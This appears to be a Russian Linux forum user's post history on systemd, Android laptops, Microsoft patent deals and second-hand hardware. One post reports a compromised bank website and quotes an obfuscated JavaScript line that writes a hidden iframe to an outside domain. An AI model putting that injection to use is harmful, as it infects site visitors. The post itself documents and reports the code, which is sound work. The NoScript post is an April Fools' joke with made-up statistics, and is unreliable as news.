LINUX.ORG.RU

Сообщения scott_tiger

 

Новости systemd: Линус Торвальдс отказался принимать в ядро патчи от разработчика udev/systemd

По ссылке с 3dnews.ru набрел на интересную дискуссию:

http://www.reddit.com/r/linux/comments/221irz/linus_blocks_all_code_from_kay_...

Вкратце. Разработчик udev и systemd Kay Sievers понаписал какой-то шняги, которая начинала флудить во время загрузки, в результате systemd вешался и не бутил систему.

Линус внес в ядро патч, исправляющий проблему, но впредь отказался принимать в ядро код от Кея Сиверса, пока он не пересмотрит свой подход к написанию кода.

http://permalink.gmane.org/gmane.linux.kernel/1677152

В дискуссии, в частности, обсуждают вопросы как может случиться что программа из юзерспейса может заспамить ядро на ранней стадии загрузки, почему такого не случалось в systemV style init, и сетуют что если бы программы были чуть более простыми, или их можно было разделить на компоненты, чтобы отлаживать только необходимые, то подобные ошибки было бы легче искать и исправлять.

Перемещено catap из job

 ,

scott_tiger
()

Из-за проблем с продажами Windows производители ноутбуков планируют использовать Android.

Разочарованные объемами продаж ноутбуков и планшетов с Windows 8, крупнейшие производители ПК присоединяются к Intel с намерением выпустить устройства с Google Android.

По неофициальным данным Lenovo планирует выпустить 11" версию Yoga c Android в мае. Утверждается, что Acer, Asus, HP и Toshiba готовят модели с Android, которые появятся в продаже в 3-м квартале. Цены на устройства обещают в районе 500$, т.е. на уровне цены на начальную версию Surface RT.

В соответствии со спецификациями Intel, устройства должны иметь отсоединяющуюся клавиатуру, т.е. могут использоваться и как ноутбук и как планшет.

Хотя Microsoft не публикует данные о продажах Surface, становится понятно, что объемы продаж неудовлетворительны, особенно это касается Surface RT.

Что касается Windows 8, аналитик IDC Боб О'Доннел заявли в начале месяца, что, похоже, Windows 8 не только не оживила рынок, но и послужила причиной снижения продаж. В марте Дж.К.Шин, co-CEO Samsung, заявил, что телефоны и планшеты на Windows продаются не очень хорошо, в отличие от устройств на Android.

Преимуществом устройств на Windows RT перед Android остается наличие в комплекте ПО Office 2013.

И, наконец, благодаря заключению договоров на лицензирование своих патентов с крупнейшими производителями устройств на Android, Microsoft будет получать доход вне зависимости от того что выберет покупатель - Android или Windows.





Подробности

Перемещено tazhate из android

 ,

scott_tiger
()

systemd-journald жжот.

Стоит у меня на домашнем сервере-рутере Арч, переставлять было лень, переполз на systemd. И вот решил воткнуть в него wifi ap.
Пропатчил дрова под dlink dwl-125 rev.B, установил hostapd/dhcpd, по ходу даже юнит для systemd подредактировал - все ок. перезагрузился - все поднимается. Стал править syslog-ng.conf, несколько раз ошибся. И вдруг наблюдаю что journalctl начал тормозить, и выдал «расширяю журнал до 75МБ». Это типа в оперативной памяти, с момента последнего ребута. Смотрю весь journal забит :
systemd[1]: syslog-ng.service start request repeated too quickly, refusing to start.
считаю:
# journalctl | grep «syslog-ng.service start request» | wc -l
96405
# journalctl | wc -l
122001
Вот блин и удобство и экономия места в бинарном логе.
И это не отключается.
Внятной инофрмации о причине ошибки кстати в journal-е не оказалось.

Привет любителям экономии и ускорения.

 

scott_tiger
()

Ricomagic mk802II продам в Москве - 2200р

Ricomagic mk802II продам в Москве - 2200р.
Куплен около месяца назад, наигрался.
n.murphy на rambler точка ру.

 mk802ii,

scott_tiger
()

Intel Atom n2800

Набрел на плату с Intel Atom n2800 со множеством вкусностей - tdp 6,5W, гигабитный ethernet, enhanced speedstep, mini pcie. Единственный затык - видео на powervr чипе. В обзоре на на ixbt написано только про дрова по windows 7. По поводу поддержки в линуксе диапазон мнений лежит в пределах между «попляши с бубном и может быть что нибудь получится» и «you totally and royally screwed», т.е. в целом не радует.

У кого нибудь есть удачный опыт работы с этим чипсетом?

scott_tiger
()

продам Sun Fire v240 в Москве

2CPU, 2G RAM, 2 SCSI HDD
2,5т.р.
n.murphy на rambler точка ру.

 , v240

scott_tiger
()

«МТС Мобильная Почта» на гуглофонах от Samsung

http://www.cnews.ru/news/top/index.shtml?2012/03/27/483034

«Пользователи смартфонов Samsung на базе мобильной операционной системы Android из разных стран сообщают о странной уязвимости в магазине мобильных приложений Google Play (бывший Android Market). На своих устройствах они обнаруживают русскоязычное приложение «МТС Мобильная Почта» (MTS Mobile Mail), которое они никогда не устанавливали по собственному желанию.

Приложение «МТС Мобильная Почта» требует полного доступа к различным функциям телефона, включая и раздел SMS, что вызвало подозрения о вредоносном характере программы.

Кроме того, большинству пользователей не удается удалить «МТС Мобильная Почта» из списка установленных программ – любые операции по удалению приложения приводят к тому, что оно восстанавливается.

... данная ситуация с появлением русского приложения от МТС на смартфонах пользователей по всему миру продолжается уже как минимум несколько недель. Представители Google и МТС пока не давали своих официальных комментариев по этому поводу...

Не было никакой информации и от Samsung, на телефонах которой обнаруживаются приложения.»

Стоило бы добавить опрос на главной «Зонд какого производителя вы предпочитаете а) Apple/iOS б) Google/Android

scott_tiger
()

Casio будет платить Microsoft за использование Linux

Согласно сообщению на сайте Microsoft ( http://www.microsoft.com/Presspass/press/2011/sep11/09-20CasioPR.mspx ), Microsoft и Casio Computer заключили обширное, многоуровневое соглашение по кросс-лицензированию, в рамках которого, в частности, Casio будет выплачивать лицензионные отчисления за использование Linux на своих устройствах. Компании соглашаются, что цель соглашения - выплата компенсации Microsoft, но детали держатся в секрете.

В связи с этим можно вспомнить тактику Microsoft по оказанию давления на Barnes&Noble весной этого года ( http://www.zdnet.com/blog/microsoft/barnes-noble-says-microsoft-is-attacking-... ). В марте этого года Microsoft обратилась в B&N c заявлением о нарушении 6 патентов MS в ОС Android, которая используется на устройствах для чтения Nook. MS заявила, что этих патентов достаточно для полного запрета использования Android на Nook, но детали о патентах могут быть сообщены только после подписания соглашения о неразглашении (Non-disclosure agreement). B&N заявила, что MS потребовала выплат за установку Android на каждом устройстве, которые более чем вдвое превышают стоимость установки мобильных ОС Microsoft.

Ранее, MS уже заключила соглашения о кросс-лицензировании с Novell, Fuji-Xerox, Samsung и Xandros, которые разрешают использование Linux указанным компаниям. Отчисления за использование Android выплачивают Acer, HTC и ViewSonic.

В 2005 году, компании противостоящие патентному троллингу объеденились в ассоциацию Open Invention Network, которая в настоящее время насчитывает более 200 активных участников (в т.ч. Cisco, Facebook, Google, HP, IBM, Juniper, Novell, Oracle, Red Hat и Twitter). На сайте ассоциации есть служба экстренной помощи - любому, кто испытывает давление из-за использования Linux предлагается обратиться за помощью в «борьбе против темных сил» ( http://openinventionnetwork.com/linux911contact.php ) .

Подробности

Перемещено annoynimous из OpenSource

scott_tiger
()

Продам Efika MX в Москве - 6т.р.

О девайсе: http://www.genesi-usa.com/products/efika

Е-почта garuda@newmail.ru
Джаббер zhuzhka@jabber.ru

scott_tiger
()

Conky - отображение баланса в Megafon/Skylink

Скрипты для получения баланса в Мегафоне как-то постил на ЛОР.
Недавно сделал аналогичный для Skylink-a. Кому интересно - добро пожаловать.

http://garuda.homeunix.net/cgi-bin/wiki/Conky

scott_tiger
()

www.promo.ru - трояны из коробки?

Предысторию изложу покороче, суть такова. На прошлой неделе знакомый стукнулся в аську и сказал что при пождении на по сайту одного из банков (пусть будет просто банк) вдруг выскочило сообщение с предложением проиграть mp3 файл. Еще один привлеченный знакомый сказал что у него стартовала джава и заорал касперский, а хромиум в режиме разработчика показывает наличие скриптов с сайта geliksss.net У меня винды нет совсем, попробовал мозиллой, да, NoScript говорит что заблокирован сайт geliksss.net

В этом банке у меня работают знакомые админы, хотя за сайт непосредственно и не отвечают. Сообщил им, они говорят служба безопасности посмотрела - всё ок.

На следующий день (в пятницу) сайт лег совсем, в пятницу же вечером его восстановили, я снова зашел мозиллой, geliksss.net пропал, появились ссылки на applicaa.net. Скачал wget-ом страницы и скрипты, в одном из файлов с джаваскриптами нашел такую строку, дописанную в конец файла и не относящуюся ни к каким фнкциям.

document.write(«<»+«i»+«f»+«rame»+" sr"+«c='http://applicaa.net/forum2/13'»+" style='d"+«isplay:no»+«ne;'></»+«i»+«f»+«rame>»);

Снова отослал коллегам с приветом службе безопасности. Дальше было еще некоторое количество общения на эту тему, в результате выяснилось:
- эти ссылки в код запихнули сами разработчики сайта
- на вопрос службы безопасности «что это?» разработчики ответили, это механизм раскрутки сайта, нет причин для беспокойства
- при более пристальном поиске обнаружился пресловутый mp3 файл, ссылка на сайт и е-адрес иранской освободительной киберармии.

Разработчик сайта - http://promo.ru/ Не хочу сказать что они злодеи и негодяи, но среди их сотрудников такие, видимо, имеются. Так что кому актуально - обратите внимание :)

scott_tiger
()

Fanbois love sex toys

Оригинал тут http://www.theregister.co.uk/2010/07/07/toy_revelation/

Крупный английский онлайн магазин товаров для секса LoveHoney опубликовал статистику Google Analytics, демонстрирующую, что пользователи iPad, в среднем, тратят на секс-игрушки больше всех (вдвое больше, чем пользователи Windows), за ними следуют пользователи iPhone-ов и пользователи Mac-ов.

Директор LoveHoney считает это свидетельством того, что пользователи продукции Apple более оригинальны и уверены в себе.

TheRegister предполагает что это скорее означает что большинство фанбоев Apple просто никогда не видели представителя противоположного пола в голом виде и предпочитают трать деньги на гаджеты типа TENGA Black Flip Hole Masturbator, после покупки которого им не приходится краснеть, спрашивая Стива Джобса, как правильно держать их устроство, чтобы получить максимальное удовлетворение.

Непростительным упущением является замалчивание статистики о пользователях Linux.

scott_tiger
()

MSI 785GM + Phenom II и HD Video

Доброго всем здоровья,

MSI 785GM + Phenom II со встроеным радеоном потянет HD Video?

scott_tiger
()

флеймообразующая статья :)

scott_tiger
()

Что за шняга - левый localhost

Посмотрел в логи почтового сервер, заметил такую фигню # host 222.252.221.254 254.221.252.222.in-addr.arpa domain name pointer localhost. # host 123.27.1.1 1.1.27.123.in-addr.arpa domain name pointer localhost.

#tracepath 222.254.130.69

1: broadband-77-37-157-174.nationalcablenetworks.ru (77.37.157.174) 0.269ms pmtu 1500 1: no reply 2: mtk-1.msk.ip.ncnet.ru (77.37.254.85) 21.858ms 3: bgw-1-po2-0.msk.ip.ncnet.ru (77.37.254.45) 17.260ms 4: mow-b2-link.telia.net (80.239.193.153) 8.885ms 5: mow-b1-link.telia.net (80.91.254.69) 15.307ms 6: s-bb1-link.telia.net (80.91.251.221) 43.056ms asymm 7 7: kbn-bb1-link.telia.net (80.91.248.45) 34.200ms asymm 8 8: nyk-bb1-link.telia.net (80.91.254.89) 132.397ms asymm 9 9: sjo-bb1-link.telia.net (80.91.252.153) 206.578ms asymm 10 10: hnk-b1-link.telia.net (80.91.249.118) 345.513ms asymm 11 11: vptc-ic-130050-hnk-b1.c.telia.net (213.248.93.118) 348.612ms 12: localhost (123.30.79.1) 420.506ms 13: localhost (123.30.120.13) 395.363ms asymm 17 14: 203.162.231.6 (203.162.231.6) 399.492ms asymm 16 1: broadband-77-37-156-2.nationalcablenetworks.ru (77.37.156.2) 10760.038ms 15: 222.255.165.42 (222.255.165.42) 405.621ms asymm 14 1: broadband-77-37-156-2.nationalcablenetworks.ru (77.37.156.2) 10691.475ms 1: broadband-77-37-156-2.nationalcablenetworks.ru (77.37.156.2) 10065.492ms 16: localhost (222.252.221.254) 435.493ms 1: broadband-77-37-156-2.nationalcablenetworks.ru (77.37.156.2) 9580.072ms 18: localhost (222.254.112.1) 426.723ms pmtu 1492 18: no reply 19: no reply 20: no reply

Что за левые localhost-ы?

scott_tiger
()

Noscript V. 1.9.1.4 умеет фильтровать первоапрельские шутки в новостях.

Новая версия полезного дополнения к Mozilla Firefox Noscript v.1.9.1.4 приурочена к 1 апреля и это не случайность. Одной из новых функций является фильтрация первоапрельских шуточных статей для на новостных сайтах.

Исследования английских ученых показали, что в прошлом году в результате принятия решений на основе неверной информации, в большом количестве публикующейся в сети 1 апреля, убытки понесли до 17,5% финансовых учреждений Европы и Америки. Эти события в значительной мере повлияли на мировой финансовый кризис, подчеркивают эксперты.

В этом году, пользователи Mozilla Firefox могут вздохнуть спокойно. NoScript надежно отфильтрует вводящие в заблуждение новости и рекламу.
Подробности

Перемещено no-dashi из Mozilla

scott_tiger
()

Linux на страже демократии.

Информация не новая, но, думаю, многим будет интересно.

На сайте GreatAmericans.com чуть больше месяца назад выложен flash-ролик "10 лучших военных роботов". Часть из них находятся в разработке, некоторые - уже используются в вооруженных силах более или менее широко. Я предпринял небольшой поиск в Google с целью выяснить какая ОС используется для управления этими машинами. Информацию удалось найти только про некоторые из них, а именно:

THE MULE Lockheed Martin - использует Linux кластер для управления основными системами http://www.botmag.com/articles/mule.s...

PREDATOR, US Air Force - информации о самих аппаратах найти не удалось, Linux используется на наземных станциях управления http://www.air-attack.com/news/articl...

TALON EOD ROBOT Foster-Miller Inc - подробной информации найти не удалось, по ссылке интервью с президентом Synexxus Inc., поставляющией системы управления на основе Linux, в т.ч. для оснащения EOD (explosive ordinance disposal - вольный перевод - разминирование) роботов Foster-Miller http://www.nationaldefensemagazine.or...



Перемещено Shaman007 из Linux General

>>> Подробности

scott_tiger
()

Управление компом кнопкой питания (еще один велосипед)

Иногда сталкивался с ситуациями когда консоль/иксы зависают и не реагируют на клавиатуру, при том что комп очевидно жив.
Чаще случаются ситуации когда комп надо выключить, для того его надо разбудить, возможно ввести имя-пароль, затем набрать команду или нажать кнопку в иксах.
Вот накатал программку, менее универсальный, но более специализированный аналог acpid. Слушает /proc/acpi/event и реагирует на последовательности нажатий кнопки питания.
Последовательность - несколько нажатий, с интервалом менее секунды.
Например - N нажатий, программа переходит в "режим команд" - ожидает следующей последовательности - от 1 до 5 нажатий, и выполняет от 1 до 5 команд, которые указываются в качестве параметра. Если нажатий не было в течение T секунд - программа переходит в исходное состояние, и снова ждет ввода. Фактически, если не нажимать кнопку, программа висит в бесконечном select, и не просыпается до нажатия кнопки power.

Пример комадной строки
powerd -n 2 -t 10 "/usr/bin/killall icewm" "/sbin/init 0" "/sbin/init 6"
Последовательности нажатий на которые реагирует программа
2 нажатия, пауза от 1 до 10 сек, 1 нажатие - убить оконный менеджер
2 нажатия, пауза от 1 до 10 сек, 2 нажатия - выключить комп
2 нажатия, пауза от 1 до 10 сек, 3 нажатия - перезагрузить комп
Остальные последовательности игнорируются.

Вполне возможно что подобное давно написано. Тем не менее - исходник в атта

http://garuda.newmail.ru/powerd.tgz

>>>

scott_tiger
()

Intel D201GLY (Sis 662) / Celeron 215 - frequency scaling ???

здравствуйте, коллеги.

Купил комп на mini itx Intel D201GLY (Sis 662) процессор - Celeron 215. Биос - последний из доступных.

Обнаружил что ни один из драйверов управления частотой процессора не походит. Кто нибудь может подсказать в чем причина - процессор/чипсет не поддерживают, нет необходимости или драйвер еще не написан?

>>>

scott_tiger
()

kurobox - продам

Продам kuro box в москве. Первая модель, 64М памяти, 200МГц проц, 1xusb 2.0, 1x100M LAN. Как-то писал про него тут. Стоит 40Г диск с гентой. Работал все время без проблем. Денег хочу 2500р.

Пишите на garuda собака newmail тчк ru

>>>

scott_tiger
()

RSS подписка на новые темы